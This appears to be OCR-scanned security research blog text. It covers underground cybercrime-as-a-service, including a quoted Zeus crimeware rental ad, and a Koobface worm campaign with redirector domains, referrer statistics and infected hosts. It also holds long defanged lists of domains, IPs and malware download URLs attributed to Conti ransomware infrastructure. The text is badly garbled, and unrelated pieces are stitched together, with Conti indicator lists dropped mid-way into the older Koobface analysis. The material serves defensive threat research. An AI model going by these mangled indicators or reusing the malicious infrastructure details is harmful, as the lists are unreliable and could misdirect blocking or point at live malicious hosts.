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Since 100 % transparency doesn’t exist in any given market no matter how networked and 
open its stakeholders are, [1]Cybecrime-as-a-Service (CaaS) in the underground marketplace 
went mainstream with the introduction of- the 76service - now available in Winter and Spring 
editions - followed by a flood of copycats monetizing commodity services on the foundations 
of proprietary underground tools. 
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Originally launched as an invite only service where only trusted individuals would be able 
to take advantage of the malicious economies of scale concept, in August, 2008 copycats 
ruined the proprietary model of the 76service by tweaking the service and converging it with 
web malware exploitation kits of their choice. The output? Near real-time access to freshly 
harvested financial data, which when combined with their aggressive price cutting once again 
lowers down the entry barriers into this underground market segment. 
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Start from the basics. Intellectual property theft in the underground marketplace has been a 
fact for over an year now, with proprietary web malware exploitation kits leaking to the average 
cybercriminals who after a brief process of re-branding and layout changing, include their very 
own copyright notice. Upon obtaining the kits for which they haven’t a cent/eurocent, it would 
be fairly logical to assume that they can therefore charge as much as they want for offering on 
demand access to them, thereby undercutting the prices offered by the experienced market 
participants. IP theft in the underground marketplace equals a volume sales driven cash 
cow that messes up the basics of demand and supply that the experienced cybercriminals 
consciously or subconsciously follow. 


Not only is IP theft a reality, but also, among the very latest Zeus crimeware for hire 
services is charging pocket money for extended periods of time : 


"[Q] What is 
[A] is a mix between the ZeuS Trojan and Malkit, A browser attack toolkit that will steal all 
information logged on the computer. After being redirected to the browser exploits, the zeus 
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bot will be installed on the victims computer and start logging all outgoing connections. 


[Q] How much does it cost? 
[A] Hosting for costs $50 for 3 months. This includes the following: 


# Fully set up ZeuS Trojan with configured FUD binary. 
# Log all information via internet explorer 

# Log all FTP connections 

# Steal banking data 

# Steal credit cards 

# Phish US, UK and RU banks 

# Host file override 

# All other ZeuS Trojan features 

# Fully set up Malkit with stats viewer inter graded. 
# 10 IE 4/5/6/7 exploits 

# 2 Firefox exploits 

# 1 Opera exploit" 


We also host normal ZeuS clients for $10/month. 
This includes a fully set up zeus panel/configured binary" 
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Think cybercriminals in order to anticipate cybercriminals. Would a potential cybercriminal 
purchase a crimeware kit for a couple of thousand dollars, when they can either rent a 
managed crimeware service, or even buy a gigabyte worth of stolen E-banking data for any 
chosen country, collected during the last 30 days? | doubt so, and factual evidence on the 
increasing number of such services confirms the trend - in 2009 anything cybercrime will be 
outsourceable. 


Related posts: 

[2]Modified Zeus Crimeware Kit Gets a Performance Boost 
[3]Modified Zeus Crimeware Kit Comes With Built-in MP3 Player 
[4]Zeus Crimeware Kit Gets a Carding Layout 

[5]The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw 
[6]Crimeware in the Middle - Zeus 


Related underground marketplace posts: 

[7]Will Code Malware for Financial Incentives 

[8]Coding Spyware and Malware for Hire 

[9]Malware as a Web Service 

[10]The Underground Economy’s Supply of Goods and Services 
[11]The Dynamics of the Malware Industry - Proprietary Malware Tools 
[12]Using Market Forces to Disrupt Botnets 
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The [1]Koobface Facebook worm - [2]go through an [3]assessment of a previous campaign 
- is once again making its rounds across social networking sites, [4]Facebook in particular. 
Therefore, shall we spill a big cup of coffee over the malware campaigners efforts for yet 
another time? But of course. 


Only OPSEC-ignorant malware campaigners would leave so much traceable points, in between 
centralizing the campaign’s redirection domains on a single IP. For instance, taking advantage 
of free web counter whose publicly obtainable statistics - the account has since been deleted 
- allow us to not only measure the clickability of Koobface’s campaign, but also, prove that 
they’re actively multitasking by combining blackhat SEO and active spreading across sev- 
eral other social networking sites. Here are some of the key summary points for this campaign : 


Key summary points : 

- the hosting infrastructure for the bogus YouTube site and the actual binary is provided by 
several thousand dynamically changing malware infected IPs 

- all of the malware infected hosts are serving the bogus YouTube site through port 7777 

- the very same bogus domains acting as central redirection points from the November’s 
campaign remain active, however, they’ve switched hosting locations 

- if the visitor isn’t coming from where she’s supposed to be coming, in this case the predefined 
list of referrers, a single line of "scan ref" is returned with no malicious content displayed 

- the campaign can be easily taken care of at least in the short term, but shutting down the 
centralized redirection points 
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www. ]biznes-kotorogo-net[.]ru 
www [.]blondes-problems[.]ru 
www[.]cagiangdh[.]xyz 
www[.]d3blog[.]ru 
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wwwl[.]dontpanicarts[.]com 
wwwl.]gbdou73spb[.]ru 
wwwl.]golominor[.]ru 
wwwl.]huanxiangdh[. ]xyz 
wwwl.]hybridenergy[.]biz 
wwwl.]ishops40[.]ru 
www. ]jierdh[.]xyz 
wwwl.]kabukevimurda[.]xyz 
wwwI[.]kinoboxonline[.]ru 
www [.]l1xs[.]Jcom 
wwwl.]langyodh[.]xyz 
wwwl.]livechat[.]Jenergyglobalinvestments[.]com 
www/J[.]lugatic[.]ru 
www[.]maxigm[.]ru 
www[.]melanett[.]ru 
wwwl[.]mordo[.]Jcom[.]ru 
www[.]nniudh[.]xyz 
wwwl.]nvjidh[.]xyz 
wwwl.]oboi-ufa[.]ru 
www. ]oirb[.]review 
wwwl.lopate[.]ru 
wwwl.loronil.]ru 
www[.]postelka61[.]ru 
wwwl.]profi-bz[.]ru 
wwwl.]qihudh[.]xyz 
wwwl.]gimadh[.]xyz 
wwwl.]rapitar[.]ru 
wwwl.]remote[.]amazon-oc[.]Jcam 
wwwl[.]roupudh[.]xyz 
wwwl.]rouroudh[.]xyz 
wwwl[.]sexhuntl[.]net 
www[.]skp-clan[.]ru 
www[.]somnag[.]ru 
www. ]tesilic[.]ru 
wwwl.]test[.]energyglobalinvestments[.]com 
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www[.]toamiwatatan[. ]platf[.]4pu[.Jcom 
www/I[.]traveltogo[.]ru 
www/I[.]Juralgt[.]ru 
wwwl.]vds-med[.]ru 
wwwl[.]wusudh[.]xyz 

www [.]xingqudh[. ]xyz 

www [.]zubyheihe|[. ]ru 
wx[.]pel[.Juf43[.]pl 
wxc[.]kj[.]vrnbkf[.Jgdn 

wyh[. Jashlynavenuebridal[.Jcom 
wyw[.]christianderiemertrust[.]org 
wz[.]gp[.]trfdel[.]p! 
wz[.]pe[.]uf43[.]p! 
x1h[.]rodcohome[.]com 
x1p[.]kel.]fcyt[.]date 
x20[.]pel.]uf43[.]pl 
x3[.Jes[.]hxsp[.]pl 
x4o[.]dx[.]n5re4[.Jeu[.Jorg 
x4y[.]personaltraininglongbeach[.]com 
x57[.Jej[.]vfryop[.Jgdn 
x6f[.]sa[.]gf643[.Jeu[.Jorg 
x7[.]x[.]wen2[.]xyz 
x7bx9[.]getvibely[.Jcom 
x81[.]kilosauce[.]Jcom 
x84[.]drc[.]z99[.]in[.Jnet 
x86[.]k9kilos[.]Jcom 
x8e[.]mbsglobalservice[.]com 
x8s[.]drc[.]z99[.]in[.]net 
x9[.]dx[.]n5re4[.Jeu[. Jorg 
x9o[.]km[.]inrhk[.]eul[.]Jorg 
x9yw[.]178lia[.]fullmoonaudio[.]com 
x[.]p[.Jarmal2[.]Jeu 
xai[.]truehomerestoration[.]Jcom 
xb9[.]sk[.]cd09[.]pl 
xba9e[.]medikels[.]Jcom 
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What follows are the surprises, namely, despite the fact that Koobface is pitched as a Facebook 
worm, according to their statistics - [5]go through a previously misconfigured malware cam- 
paign stats - the majority of unique visitors from the December's campaign appear to have 
been coming from Friendster. As for the exact number of visitors hitting their web counter, 
counting as of 7 November 2008, 12:58, with 91,109 unique visitors on on 07 Nov, Fri and 
another 53,260 on 08 Nov, Sat before the counter was deleted, the cached version of their 
web counter provides a relatively good sample. 


On each of the bogus Geocities redirectors, the very same lostart .info/js/gs.js (58.241.255.37) 
used in the previous campaign, attempts to redirect to find-allnot .com/go/fb.php 
(58.241.255.37) or to playtable .info/go/fb.php (58.241.255.37), with fo.php doing the 
referrer checking and redirecting to the botnet hosts magic. Several other well known 
malware command and control locations are also parked at 58.241.255.37 : 


jobusiness .org 
a221008 .com 
y171108 .com 
searchfindand .com 
ofsitesearch .com 
fashionlineshow .com 
anddance .info 
firstdance .biz 
prixisa .com 
danceanddisc .com 
finditand .com 
findsamthing .com 
freemarksearch .com 
find-allnot .com 
find-here-and-now .com 
findnameby .com 
anddance .info 


These domains, with several exeptions, are actively participating in the campaign, with 
the easiest way to differentiate whether it’s a Facebook or Bebo redirection, remaining the 
descriptive filenames. For instance, fo.php corresponds to Facebook redirections and be.php 
corresponding to Bebo redirections (ofsitesearch .com/go/be.php). However, the meat resides 
within the statistics from their campaign : 
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xbk[.]noocogito[.]com 
xca[.]go4price[.]Jcom 
xd9[.]erinfowlerrealtor[.]com 
xd[.]femininecocreators[.]com 
xeal[.]nooforce[.]com 
xfO[.]Jaepmedical[.Jcom 
xf[.]Jthewellman[.]club 
xf[.]x[.]wen2[.]xyz 
xgal[.]nightpics[.]co 
xia[.]letr[.]yeniklipler[.Jorg 
xingqudh[.]xyz 
xig[.]logcor[.]net 
xj[.Jej[.]vfryop[.]Jgdn 
xj[.Jletr[.]yeniklipler[.Jorg 
xjk[.]sc[.]bOOi[.]pl 
xk[.]gametimejets[.]us 


xkd[. ]lifetimecounselingandconsulting[.]net 


xkh[.]sa[.]gf643[.]eu[.Jorg 
xkm[.]nandiawards[.]com 


xlj[. ]susheeventures[.]com 


xlu[.]xn-proyectolambsmxico-owb[.]org 


xm[.]ej[.]vfryop[.]Jgdn 
xn[.]goodyard[. ]cl 
x04[.]beautifulyouskincareca[.]Jcom 
xo[.Jes[.]hxsp[.]p! 
xp[.]2w[.]rvcx[.]party 
xpplml[.]4irc[.]Jcom 
xpv[.Jidueh[.Jeu 
xq[.]Jlowellperry[.]Jcom 
xr[.]pel.Juf43[.]pl 
xrf[.]Jtheramedinc[.]com 
xt8[.]Jnm[.]bewzaf[.]top 
xta[.]dominationradionetwork[.]com 
xul[.]panamedios[.]com 


xv4[.]cloc[.]nevzorov[.]org 
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xv8[.]ke[.]fcyt[.]date 
xv[.]x[.]wen2[.]xyz 
xvh[.]empirepoolservices[.]com 
xvp[.]mz[.]tst65[.Jeu[.]org 
xvpise[.]rg[.]ro 
xvw([.]178lia[.]fullmoonaudio[.]com 
xvw[.]lp[.]kltren[.]com 
xx5[.Jes[.]hxsp[.]pl 
xxx[.]hybridenergy[.]biz 
xy8[.]vs[.]tnmul[.]pw 
xyp[.Jaccess-card[.]org 
xyv[.Jinchesaway[.]net[.Jau 
xyx[.]Jezdancingonline[.]Jcom 
xz2[.]pe[.]uf43[.]pl 
xzk[.]midatravel[.]com 
xzr[.]sc[.]bO0Oi[.]pl 

y-gov[.]work 
y13[.]yoxaaare|[.]gq 
y1k[.]polkadotpullet[.Jcom 
y24[.]ng[.]Jcwsr[.]pl 
y2[.]Jle[.]fw74[.]pl 
y2d[.]vs[.]rtt9[.Jeu 

y2jl[. ]homeandhealthsolutions[.]com 
y2m[.]cloudstreamdj[.]com 
y2z[.]cloc[.]nevzorov[.]org 
y311uq[.]rg[.]ro 
y36[.]rw[.Jaro4[.]pl 
y3[.Jes[.Jhxsp[.]pl 
y3[.]x[.]wen2[.]xyz 
y4n[.]fk[.]Jcxtme[.]win 
y4o[.]cloc[.]nevzorov[.]org 
y5rl[.]cloc[.]Jnevzorov[.]org 
y63[.]gabrielamartinezymartinez[.]Jcom 
y6[.]x[.]wen2[.]xyz 
y6pf[.]cloc[.]nevzorov[.Jorg 
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y7u[.]backlashnow[.]com 
y8[.]x[.]wen2[.]xyz 
y93kos[.]rg[.]ro 
y9[.]x[.]wen2[.]xyz 
yah[.]legendsplays[.]Jcom 
yaosenhosogo[. ]platf[.]4pul[.Jcom 
ybd[.]gt[.Jhr67[.]pl 
yby[.]yoxaaare[.]gq 
yc6[.]decadencedesigns[.]com 
yd[.Joriginalmanspread[.]com 
yd[.]Jsampleitinerary[.]com 
ye[.]henristhisnthat[.]Jcom 


ye[.]steadyboard[.]net 


yeu[.]mollandersonlifeandstyle[.]Jcom 


yf[.]vs[.]rtt9[.Jeu 

yg5z0[. ]johnreneaud[.]Jcom 
yg[.]bestbikeoil[.Jcom 
ygyl[.]wstr[.]cf 
ygz8je[.]myfw[.]us 
yh7[.]kilosauce[.]Jcom 
yih[.]dx[.]n5re4[.Jeul[.lorg 
yiw[.]ligiabarao[.Jcom 
yj[.]Jnm[.]bewzaf[.]top 

yjc[. ]rgobconversant[.]com 
yjz[.]cloc[. ]nevzorov[.]lorg 
yks[.]guitardisorder[.]Jcom 
ykt[.Jalbatrot[.]Jcom 
ykv[.]silverforte[.]Jcom 
yland-gov[.]me 
ylv[.Jejl.]vfryop[.]gdn 
yme[.]myactorfactor[.]com 
ymg[.]no[.]cvine[.]win 
yoa[.]dx[.]n5re4[.]eu[.Jorg 
yochigakuyoi[.]platf[.J4pu[.]com 
yok[.]sherryliptandesign[.]Jcom 
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yom[.]cloc[.]nevzorov[.]lorg 
yos[.]kylabras[.]Jcom 
ypc[.]danemarkphotoart[.]Jcom 
ypesic[. ]3utilities[.]Jcom 
yph[.]bx[.]tcd3[.]p! 
yq[.]fastbike[.]Jin 
yql.]pel.Juf43[. ]pl 
yqc[.]Jata-ald[.Jorg 
yqm[.]dqcattuong[.]com 
yr[.]5a[.]zoq[.]space 
yrh[.]dx[.]n5re4[.Jeu[.]org 
yrjqa[.]myredirect[.Jus 
yrlg7g[.]rg[.]ro 
ysp[.]jst[.]ppf.]ua 
ysu[.]no[.]fi9d[.]eul[. Jorg 
yt[.]bb[.Jcda9[.]pl 
yt[.Jym[.]klbg[.Jeul[. Jorg 
ytdwb[.]brOs[.Jinfo 
ytn[.]sa[.]gf643[.]eu[.]Jorg 
yty[.]epiccircuitspc[.]com 
yua[.Jed[.]i743[.Jeu[.]org 
yuk[.]Jhz[.]tvcsd[.]p! 
yvO[.]dontbeafuccboil.Jcom 
yvp[.]callyguthrie[.]com 
ywo[.]Jimaginarypen[.]com 
yx[.Jmwl[.]kerv[.]Jreview 
yy7[.]Jnm[.]bewzaf[.]top 
yyk[. ]iphigeniamanthos[.]com 
yzd[.]cloc[.]nevzorov[.lorg 
yzn[.]pe[.]uf43[.]pl 
z00[.]yoxaaare[.]gq 
zO[.Jesl[.]ffeo[.Jdate 
Z1[.]sc[.]bOOi[.]p! 
z2wf[.]cloc[.]Jnevzorov[.]lorg 
z3s[.]gw[.]btse[.Jreview 
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z3u[.]mz[.]tst65[.]Jeu[.Jorg 
Z4k[.]shaynjays[.]Jcom 
z5[.]dx[.]n5re4[.Jeu[.Jorg 
z5ng[.]178lia[.]fullmoonaudio[.]Jcom 
z5o[.]shelleywall[.Jcom 
z7t[.]mz[.]tst65[.]eul[.Jorg 
z7wl.]fmkfvuvo[.]gq 
z8[.]pel[.]uf43[.]pl 
z8h[.]xb[.]frdme[.]top 
z8t[.]lym[.]klbq[.Jeul.Jorg 
z9[.]x[.]wen2[.]xyz 
z9m|[.Joqslaxl[.]ga 

z906hmM[. ]rg[.]ro 

zafie[.Jru 

zat[.]vncuie[. ]top 
zatsurikuarume[.]platf[.]4pu[.]Jcom 
zb[. Jlashesbyalexis[.]Jcom 
zb[.]ym[.]klbaq[.Jeu[.Jorg 
zbm[.]adoptfla[.]com 
zbn8wip[.]rg[.]ro 
zbw[.]alloftheglory[.]com 
zbz[.]the-constellation[.Jorg 
zcazel[.]findhere[.]Jorg 
zci[.]kj[. ]}vrnbkf[.Jgdn 
zckmz[.]dynu[.]com 
zcwl.]qd[.]dpo2[.]pl 
zd[.]pe[.]uf43[.]p!l 
zdk[.Jdrc[.]z99[.Jin[.]net 
ze[.]qv[.]cuov[.Jeu 
zf7[.Jor[.]dfct[.]stream 
zf[.Jereceipt[.]cloud 
zfjl.Jxh[.]Jsd61a[.Jeul.Jorg 
zft[.]Jdemetriusofficial[.]Jcom 
zg[.]fastbikesindia[.]com 


zge[.]smartenergybid[.]com 
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zhO[.Jmw[.]kerv[.]review 
zhrhovbp[.]nerdcamp[.]net 
zhu[.]qd[.]dpo2[.]pl 
zi3[.]Jnm[.]bewzaf[.]top 
zi[.]wf[.]4246[.]pl 
zijbtf[.]deaftone[.]com 
Zj5[.]Jhh6v[.]cf 
zjh[.]Jcentury21southbeach[.]Jcom 
zk[.Jlg[.Jhtr8[.]pl 
zi[.]Jecologyair[.]Jcom 
zlktfowy[.]Jnerdcamp[.]net 
zlz[.]Jconsumpt10n[.]com 
zmail[.]traveltogo[.]ru 
zo[.]178lial.]fullmoonaudio[.]com 
zoc[.]Jdm[.]hcsop[.]eu[.Jorg 
zoj[.]bb[.]cda9[.]p!l 
zokugirigakuril[.]platf[.]4pu[.]com 
zom[.]vegforless[.]com 
zoom[.]hybridenergy[. ]biz 
zp[.]27craiglee[.]com 
zpt[.]sq[.]Jatuf[.]pl 
zq[.Jeliotporter[.]net 
zrf[.]bigcanes[.]com 

zrx[. ]mindfulness-in-medicine[.]net 
zsb[.]dkj[.]viutg[.Jgdn 
zsf[.]fk[.]Jcxtme[.]win 
zsl[.]bw[.]vsoe[.]space 
zt[.]terralica[.]Jcom 
ztr[.]cliniquego[.]org 
zu7[.Jinbestform[.]net 
zu[.]stoopsurf[.]Jcom 
zubis[.]Jimahillbilly[.]com 
zubyheihe[.]ru 
zukirisakaze[.]platf[.]4pu[.]Jcom 
zv[.]ke[.]fcyt[.]Jdate 
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zvo[.]ej[.]vfryop[.Jgdn 
zw[.]thebards[.]us 


zxO[.]helidroneservices[.]co 
zx[.]fivearrowscompanies[.]com 
zxw([.]cloc[.]Jnevzorov[.]Jorg 

zyg[. ]Jeatmywaythroughfrance[.]com 
zzl[.]shoppingwithlulu[.Jcom 


Related responding domains known to have participated in Conti ransomware gang’s C &C 


(Command and Control) and Internet connected infrastructure include: 


Apu[.Jcom 
52dsw[.]club 
8f886[.]com 
aasfhhvyyayssa[.]xyz 
alaskagova[.]Jcom 
asgyyya6ychchal[.]xyz 
asoexample[.]site 
ball-layouts[.]Jcom 
baramanamc[.]Jcom 
bartholaraka[.Jcom 
bestcom[.]be 


bindolsmaoldmsozlas[. ]site 


browsergxopera[.]com 
busand[.]xyz 
byOts[.]net 
canalij[.]Jcom 
candabare[.]com 
cfbb203[.]com 
charmhub[. lio 
configwells-2yn[.]Jcom 
contestep[.]com 
cpven[.]Jcom 
datacloudhub[.]net 
dc5yourmaill[.]gq 
developer[.]space 
diavol-news[.]net 


dierodiusapp[.]co 
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docame[.]xyz 
eco-link-shop[. Jru 
ecolinkshop[.]ru 
energyglobalinvestments[.]Jcom 
enigma-hg[.]net 
fantn[.]cc 
fuhkomsqIh[.]net 
gfgxfh[.Jicu 
gx-opera[.]com 
gxoperabrowser[.]com 
inbox[.]Jland 
jaredyounger[.]com 
k-in-gov[.]site 
karanabaz[.]com 
koltygo[.]Jcom 
lesta[.Jorg 
martinswood[.]com 
medimassage[.]hu 
myz[.linfo 
navercorpal[.]website 
onlinens[.]Jicu 
operagxbrowser[.]Jcom 
orgyhehan|[. ]tk 
paperflies[.]buzz 
paprikart[.]hu 
petite[.]co[.]in 
portymara[.]Jcom 
publicvm[.]com 
rocroyalbanque[.]info 
rlalonarwa[. ]xyz 
s3crt[.]biz 

salem80[. info 
selffarma[.Jcom 
selfpharmal[.]Jcom 
selfpharma|. ]p! 
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sendgrid[.]net 
sinewave[.]space 
snapcraft[.]Jio 
the-bloodbalance[.]net 
uhbx[.]co 
uk-msg[.]pro 
upgittas[.]Jcom 
vidio[.]win 
wb5nfc[.]net 
zhangxiaobin8848[. ]xyz 
zyazx[.]com 


Related malicious URIs known to have participated in Conti ransomware gang’s C &C (Com- 
mand and Control) and Internet connected infrastructure include: 


hxxp://10yt[.]is/fenrircloudstrife15374 
hxxp://117[.]252[.]69[.]134 
hxxp://117[.]252[.]69[.]134 
hxxp://139[.]28[.]235[.]177 
hxxp://139[.]28[.]235[.]177 
hxxp://148bd4fal[.]micro1[.]inbox[.]land/ 
hxxp://148bd4fal[.]micro3[.]Jinbox[.]land/ 
hxxp://154[.]61[.]71[.]53 
hxxp://154[.]61[.]71[.]53 
hxxp://154[.]61[.]71[.]53/ 
hxxp://154[.]61[.]71[.]54 
hxxp://154[.J61[.]71[.]54/ 
hxxp://158[.]69[.]133[.]72 
hxxp://158[.]69[.]133[.]72 
hxxp://161[.]35[.]126[.]145 
hxxp://161[.]35[.]126[.]145 
hxxp://161[.]35[.]126[.]145/ 
hxxp://162[.]244[.]81[.]252 
hxxp://162[.]244[.]81[.]252 
hxxp://16648[.]css[.]derp-cdn[.]com/ 
hxxp://172[.]243[.]178[.]252 
hxxp://172[.]243[.]178[.]252 
hxxp://173[.]19[.]92[.]26 
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hxxp://173[.]19[.]92[.126 
hxxp://173[.]19[.]92[.]26/ 
hxxp://174[.]96[.]143[.13/ 
hxxp://179[.]43[.]147[.]243:447/mac1/ 
hxxp://185[.]158[.J249[.]119/ 
hxxp://185[.]158[.]249[.]119/info/CA/sh/J761TXD/user/RB/775ca55 b655162b29f246a67460f8500 
hxxp://185[.]158[.]249[.]249/ 
hxxp://185[.]158[.]249[.]249/login 
hxxp://185[.]158[.]249[.]249:80 
hxxp://185[.]189[.]151[.]142 
hxxp://185[.]189[.]151[.]142 
hxxp://185[.]189[.]151[.]142/ 
hxxp://185[.]189[.]151[.]142:1122 
hxxp://185[.]189[.]151[.]142:5200 
hxxp://185[.]193[.]37[.]222/ 
hxxp://185[.]244[.]41[.]9 
hxxp://185[.]244[.]41[.19 
hxxp://185[.]244[.]41[.19/ 
hxxp://185[.]25[.]48[.]83:8080 
hxxp://185[.]38[.]185[.]13 
hxxp://185[.]38[.]185[.]13 
hxxp://185[.138[.]185[.]13:443 
hxxp://185[.]38[.]185[.]13:443 
hxxp://185[.]99[.]132[.]248 
hxxp://185[.]99[.]132[.]248 
hxxp://185[.]99[.]132[.]248/ 
hxxp://185[.]99[.]132[.]248/service/client 
hxxp://185[.]99[.]132[.]248/service/client/telemetry 
hxxp://185[.]99[.]132[.]248:443 
hxxp://185[.]99[.]132[.]248:443 
hxxp://185[.]99[.]132[.]67 
hxxp://185[.]99[.]132[.]67 
hxxp://185[.]99[.]132[.]67/ 
hxxp://185[.]99[.]132[.]67:443 
hxxp://185[.]99[.]132[.]67:443 
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All Website Referrers 


14659 | 24.04% | http://www.friendster.com/messages.php 
12633 | 20.72% | http://youtube-x-files.com 
9206 
4386 7.19% | http://asda345.blogspot.com 


http://youtube-go.com 


3594 5.89% | http:/‘www.bebo.com/mail/MailView.jsp 

2976 4.88% | http://www.friendster.com/bulletin.php 

2431 3.99% | http://messaging.myspace.com/index.cfm 
915 
639 
597 0.98% | http://youtube-spy.5x.pl 
589 0.97% | http://youtube-files.bo.pl 


http://bulletins.myspace.com/index.cfm 
http://www.google.com.om/reader/shared/0142675145027 1110670 


575 0.94% | http://youtube-media.none.pl 

571 0.94% | http://youtube-files.xh.pl 

569 0.93% | http://youtube-spy.dz.pl 

554 0.91% | http://youtube-files.esite.pl 

545 0.89% | http://youtube-spy.bo.pl 

539 0.88% | http://youtube-spy.nd.pl 

515 0.84% | http://youtube-spy.edj.pl 

486 0.80% | http://spy-video.oq.pl 

http://66.102.9.104/search 

104 0.17% | http://64.233.183.104/search 

100 0.16% | http://www.bebo.com/mail/MailList.jsp 
99 0.16% | http://www.google.com.om/reader/share d/04606330445622 102996 


Malware serving URLs part of Koobface worm’s December’s campaign, based on the identical 
counter used across all the malicious domains : 
youtube-x-files .com 

youtube-go .com 

youtube-spy.5x .pl 

youtube-files.bo .pl 

youtube-media.none .pl 

youtube-files.xh .pl 

youtube-spy.dz .pl 

youtube-files.esite .pl 

youtube-spy.bo .pl 

youtube-spy.nd .pl 

youtube-spy.edj .pl 

spy-video.oq .pl 

shortclips.bubb .pl 

youtubego.cacko .pl 


asda345.blogspot .com 
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hxxp://185[.]99[.]133[.]115/ 
hxxp://188[.]127[.]226[.]236:443 
hxxp://188[.]127[.]226[.]236:443 
hxxp://188[.]127[.]226[.]236:8080 
hxxp://192[.]154[.]176[.]134 
hxxp://192[.]154[.]176[.]134 
hxxp://192[.]154[.]176[.]134/ 
hxxp://192[.]99[.]255[.]38 
hxxp://192[.]99[.]255[.]38 
hxxp://192[.]99[.]255[.138/ 
hxxp://192[.199[.]255[.]38/bIKf 
hxxp://192[.]99[.]255[.]38/fghhf6 7ftg 7fgt 


hxxp://192[.]99[.]255[.]38/lib429/161-Jeffrey_W617601[.]71817ADC113CCBE77DD50D715D0BF4- 


39} 


hxxp://192[.]99[.]255[.]38/lib429/161-Jeffrey_W617601[.]71817ADC113CCBE77DD50D715D0BF4- 


39/81 

hxxp://193[.]27[.]228[.165 
hxxp://193[.]27[.]228[.165 
hxxp://193[.]8[.]172[.]239/ 
hxxp://193[.]8[.]172[.]239/images/ 
hxxp://193[.]8[.]172[.]239/images/tooltipred[.]png 
hxxp://194[.]135[.]33[.]137:80 
hxxp://194[.]15[.]113[.]92 
hxxp://194[.]15[.]113[.]92 
hxxp://194[.]15[.]113[.]92/ 
hxxp://194[.]36[.]191[.]19 
hxxp://194[.]36[.]191[.]19 
hxxp://194[.]36[.]191[.]19/ 
hxxp://194[.]36[.]191[.]19/43976[.]6683509259[.]dat 
hxxp://194[.]36[.]191[.]19:443 
hxxp://195[.]123[.]214[.]177:22 
hxxp://195[.]123[.]221[.]248 
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hxxp://ainozoil.]ecolink24[.]ru/goinf _plugin[.lexe?etag=bb06b97b3ef41833015233- 
ecd9dea3d7 


hxxp://ainozoi[.Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=498c2d1e26433792ca6546d5d- 
27e155e 


hxxp://ainozoi[.Jecolink24[.]Jru/goinf _plugin _cis[.]Jexe?etag=d260d25aa746c827fe6069cf3- 
10bd468 


hxxp://ainozoil[.]ecolinkshop[. ]ru/goinf _plugin[.Jexe?etag=1c519bb2b757a64ac774c1- 
d8f38aafa4 

hxxp://aio[.]Jmamashoping[.]cloudns[.]cx/sitemap[. ]txt 

hxxp://aisleyi[.]Jeco-link-shop[.]ru/goinf _plugin[.]lexe?etag=04f16028e1124ba1e18b31- 
2bf7ca29e7 

hxxp://aisleyi[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=4a32c59fa23bb338adf47f- 
402bfb5e24 


hxxp://aisleyi[.Jeco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=06c291854a6afe860125eb6bf- 
69efe96 


hxxp://aisleyi[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=19fle7dd3d2539bfe3905fae7- 
e451a94 


hxxp://aisleyi[.Jeco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=7e42c564c022578415aff22a6- 
fb49587 


hxxp://aisleyi[.Jeco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=f97b9cf1lb46fcf41d889a1f06- 
5c3145f 


hxxp://aisleyi[.Jecolink24[.]ru/goinf _plugin[.]lexe?etag=3dd234c97aca38c3442074- 
0319719712 


hxxp://aisleyi[.Jecolink24[.]Jru/goinf _plugin _cis[.Jexe?etag=224a3e270dedba52806edb311- 
f03c25a 


hxxp://aisleyi[.Jecolink24[.]Jru/goinf plugin _cis[.Jexe?etag=7c78e585e70c299856ab6b0eea- 
Of084ae 


hxxp://aisleyi[.Jecolink24[.]Jru/goinf _plugin _cis[.Jexe?etag=90d5267521ec5753f12b6cf32- 
d191le2b 


hxxp://aisleyi[.]Jecolinkshop[. ]ru/goinf _plugin[.Jexe?etag=fboc3d2d70f3c107497567a- 
8864894a0c 


hxxp://aisleyi[.Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=0e95a326f9944a638561c088d- 
80d9900 
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uholyejedip556.blogspot .com 
ufyaegobeni7878.blogspot .com 
uiyneteku20176.blogspot .com 
ujoiculehe19984.blogspot .com 
uinekojapab29989.blogspot .com 
uhocuyhipam13345.blogspot .com 


Geocities redirectors participating : 
geocities .com/madelineeaton10/index.htm 
geocities .com/charlievelazquez10/index.htm 
geocities .com/raulsheppard18/index.htm 


Countries 
| United Kingdom «EET 16992 | 22.20% | NNN 
Phitippines——~“—t*éi OT | 
TUntedsaes ”—~“*‘s*éwRY OO | OT 
[Moly SSC~<“C~*~‘“‘~*~*~sRSYSC | 
Tukey SSCSC~S ar | | 
[canada C308 | 40cm ( 
| Austratia Cet | 3ce% | 
| NewZealand Cosa | 3am | 
| Singapore S023 | 26mm | 
Belgium EH] to | 25% | 
lreland | 1832 | 2.39% | 
France Gof 
Croatia clea [ om if 
[indonesia Set | tom | 
aly Besos 
Ey =) 
Denmark loaf om ie 
fiat Ce | rm 
Greece Bl ss|om lp 
Saudi Arabi I 
Japan laa | osm i SCSC~*™ 
Germany M3; 396] 0.52% | 


Sample malware infected hosts used by the redirectors : 
92.241.134 .41:7777/?ch= &ea= 

89.138.171 .49:7777/?ch= &ea= 

92.40.34 .217:7777/?ch= &ea= 
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hxxp://aisleyi[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=992fceb935091359de7661629- 
18e081d 


hxxp://aisleyi[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=aeea7ba0d738e50b581c54180- 
34ebf40 


hxxp://ait[. ]mamashoping[.]cloudns[.]cx/sitemap[. ]txt 
hxxp://aje[.]mamashoping[.]cloudns[.]cx/sitemap[. ]txt 
hxxp://ajj[. ]Jmamashoping[.]cloudns[.]cx/sitemap[.]t xt 
hxxp://ajm[.]mamashoping[.]cloudns[.]cx/sitemap[. ]txt 


hxxp://ajorana[.]Jecolink24[.]ru/goinf _plugin[.Jexe?etag=52b4995badd5dad361c898- 
Ofabf6e6f8 


hxxp://ajs[. ]mamashoping[.]cloudns[.]cx/ 

hxxp://ajs[. ]Imamashoping[.]cloudns[.]cx/sitemap[.]txt 
hxxp://aju[. ]mamashoping[.]cloudns[.]cx/sitemap[. ]txt 
hxxp://aka[.]mamashoping[.]cloudns[.]cx/sitemap[.]txt?id= 
hxxp://akademiyapil[.]com/ 
hxxp://akai[.]oneshop[.]getmyip[.]com/article/1/5 


hxxp://akaka[. Jal[.]ru/gourl[.]pohp?go=hxxp://aam[.]mamashop ing[.]cloudns[.]cx/site- 
map[.]txt 

